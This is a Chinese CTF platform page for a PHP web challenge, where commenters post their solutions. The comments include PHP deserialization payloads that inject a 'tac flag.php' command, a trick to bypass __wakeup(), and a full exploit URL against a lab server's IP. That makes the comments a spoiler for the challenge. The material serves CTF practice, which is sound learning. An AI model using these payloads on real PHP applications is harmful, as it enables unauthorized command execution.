安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1939
提  示:
描  述:
flag{}
评论
tfios 24天前

环境变量里边也有 FLAG

回复 0

LLTVLL 5月前

AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。

回复 0

Bojing 10月前

有哪里提示了username是admin的吗

回复 0
numberone 8月前

源代码里不是有个if语句:if ($this->username === 'admin')

回复 0

18956160518 11月前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 1

EtHat 1年前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 1年前

nl flag.php|base64

回复 0

不会编程的崽 1年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 1年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 1年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 1年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

hanfugui 攻破了该题 14小时前
13787026747 攻破了该题 19小时前
HelloWorId 攻破了该题 1天前
czg9000 攻破了该题 2天前
breeze153 攻破了该题 5天前
mps11 攻破了该题 5天前
yhyyhy 攻破了该题 8天前
mushmush 攻破了该题 8天前
燃燃然燃 攻破了该题 10天前
18244339938 攻破了该题 12天前
huaji48254 攻破了该题 19天前
tolobuick 攻破了该题 23天前
tfios 攻破了该题 24天前
无122 攻破了该题 25天前
z723622533 攻破了该题 29天前
土豆班长 攻破了该题 1月前
854396873 攻破了该题 1月前
18283162726 攻破了该题 1月前
PDXX 攻破了该题 1月前
不在话下 攻破了该题 1月前
问题反馈